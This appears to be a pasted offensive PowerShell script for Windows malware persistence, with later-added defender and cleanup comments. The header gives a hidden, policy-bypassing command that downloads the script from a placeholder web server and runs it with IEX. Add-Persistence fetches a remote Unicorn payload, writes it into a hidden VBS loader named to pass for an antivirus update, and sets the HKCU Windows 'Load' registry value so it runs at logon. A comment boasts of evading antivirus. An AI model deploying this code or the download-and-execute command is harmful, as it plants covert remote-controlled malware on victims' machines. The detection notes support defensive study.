Alonnso_888

PersistenceMetasploit2

Jan 18th, 2019
  1. # powershell-persistence.ps1
  2. # Author: @curi0usJack
  3. #
  4. # Assumes your target has the ability to download files
  5. #
  6. # 1) Use Unicorn to generate your encoded powershell command. This command will be used for persistence when the user logs in.
  7. # 2) Save to a text file somewhere you can download it.
  8. # 3) Call this from your shell:
  9. #   powershell.exe -window hidden -exec bypass -noni -c "IEX (New-Object Net.WebClient).DownloadString('http://WEBSERVER/powershell-persist.ps1'); Add-Persistence http://WEBSERVER/powershell_attack.txt"
  10. #
  11. # Kudos to @slobtresix for the initial model. Modified to work directly with unicorn payloads.
  12. #
  13. #
function Add-Persistence()
{
    # Purpose (as written): fetch a string from $payloadurl, wrap it in a
    # small VBScript loader, drop that loader hidden under the current user's
    # %APPDATA%, and point the HKCU "...\Windows NT\CurrentVersion\Windows" Load
    # value at it. The file header describes the effect as running the command
    # at user logon.
    #
    # Parameters:
    #   $payloadurl - URL whose response body becomes the "ps" string in the
    #                 VBS loader. Mandatory.
    # Outputs: status lines via Write-Host; writes one file and one registry
    #          value (see below). No return value; returns early if the
    #          download is empty.
    #
    # Defender notes (artifacts this function leaves, all per-user, no admin
    # required):
    #   - a Hidden .vbs file at "$env:APPDATA\update-avdefs.vbs"
    #   - a REG_SZ "Load" value under
    #     HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows whose data
    #     is that file path
    #   - an outbound HTTP(S) fetch from powershell.exe via
    #     System.Net.WebClient.DownloadString
    # File-creation and registry-value-set telemetry on those two locations,
    # and script-block logging of the download call, are the observable points.
    param
    (
        [parameter(Mandatory=$true)]
        [string]
        $payloadurl
    )
   
    # Loader is saved under %APPDATA% (the code reads $env:APPDATA, not %TEMP%).
    $tmpdir = $env:APPDATA
   
    # Change this if desired.
    # NOTE: Remove-Persistence below hard-codes this same default path; a
    # loader written elsewhere will not be cleaned up by it.
    $payloadvbsloaderpath = "$tmpdir\update-avdefs.vbs"
 
    # Determine if user is admin. Not required, but nice to know.
    # Only informational: nothing after this branches on $admin, and every
    # write below targets HKCU and the user profile.
    $admin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
    if ($admin -eq $true)
        { Write-Host "[+] User is a local administrator!" }
    else
        { Write-Host "[-] User is not a local administrator." }
 
    # Download and verify the payload.
    # "Verify" here means only a non-empty check (below); the content is not
    # authenticated or integrity-checked in any other way before it is embedded
    # in the loader.
    Write-Host "[+] Downloading payload $payloadurl"
    $payload = (New-Object Net.WebClient).DownloadString($payloadurl)
   
    # .Length on the returned string is a character count, although the
    # success message reports it as bytes.
    $payloadlength = $payload.Length
    if ($payloadlength -gt 0)
        { Write-Host "[+] Payload length: $payloadlength bytes" }
    else
    {
        Write-Host "[!] Payload length: 0 characters. Is the web server up?"
        return
    }
   
    # Create the VBS file and insert the powershell command from unicorn.
    # The downloaded string is interpolated verbatim into a VBS double-quoted
    # literal, so the loader's content is whatever the web server returned.
    Write-Host "[+] Creating VBS loader."
    $vbs = "Set oShell = CreateObject( ""WScript.Shell"" )`r`n"
    $vbs += "ps = ""$payload""`r`n"
    $vbs += "oShell.run(ps),0,true"
    $vbs | Out-File $payloadvbsloaderpath -Force
   
    # Mark the file as hidden.
    # Plain directory listings will omit it; "-Force" (as used here) or
    # attribute-aware tooling still shows it.
    Write-Host "[+] Marking $payloadvbsloaderpath as Hidden."
    $fileObj = get-item $payloadvbsloaderpath -Force
    $fileObj.Attributes="Hidden"
   
    # Set the LOAD key. Haven't been caught by AV yet. ;-)
    # This is a value ("Load") under the Windows key, not a key of its own;
    # baseline this location and alert on any non-empty data written to it.
    Write-Host "[+] Updating registry with a LOAD key"
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" -Name LOAD -Value $payloadvbsloaderpath
 
    Write-Host "[+] Done!"
}
  67.  
function Remove-Persistence()
{
    # Purpose: undo Add-Persistence for the current user, using its default
    # locations only. Deletes "$env:APPDATA\update-avdefs.vbs" if present and
    # clears the HKCU "...\Windows NT\CurrentVersion\Windows" Load value if, and
    # only if, its data equals that exact path.
    #
    # Parameters: none. Outputs: status lines via Write-Host. No return value.
    #
    # Cleanup / IR notes:
    #   - Everything here is scoped to the calling user's HKCU hive and
    #     profile; run it in the context of the account that was persisted,
    #     and check other profiles separately.
    #   - Because the registry branch compares against one hard-coded path, a
    #     Load value pointing anywhere else (e.g. a loader written to the
    #     path that Add-Persistence invites you to change) is reported as
    #     "not found" and left in place. Inspect the value directly rather
    #     than trusting the "[-] LOAD registry key not found." line.
    $appdir = $env:APPDATA
    $payload = "$appdir\update-avdefs.vbs"
   
    # Test-Path sees the Hidden file; -Force is needed for the delete since
    # Add-Persistence set the Hidden attribute.
    if (Test-Path $payload)
    {
        Remove-Item -Path $payload -Force
        Write-Host "[+] Found and removed $payload."
    }
    else
        { Write-Host "[-] $payload not found." }
       
    # Reads the whole Windows key; only the LOAD property is examined.
    $reg = Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows"
    if ($reg.LOAD -eq $payload)
    {
        Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" -Name LOAD
        Write-Host "[+] Found and removed LOAD registry key."
    }
    else
        { Write-Host "[-] LOAD registry key not found." }
   
    Write-Host "[+] Done."
}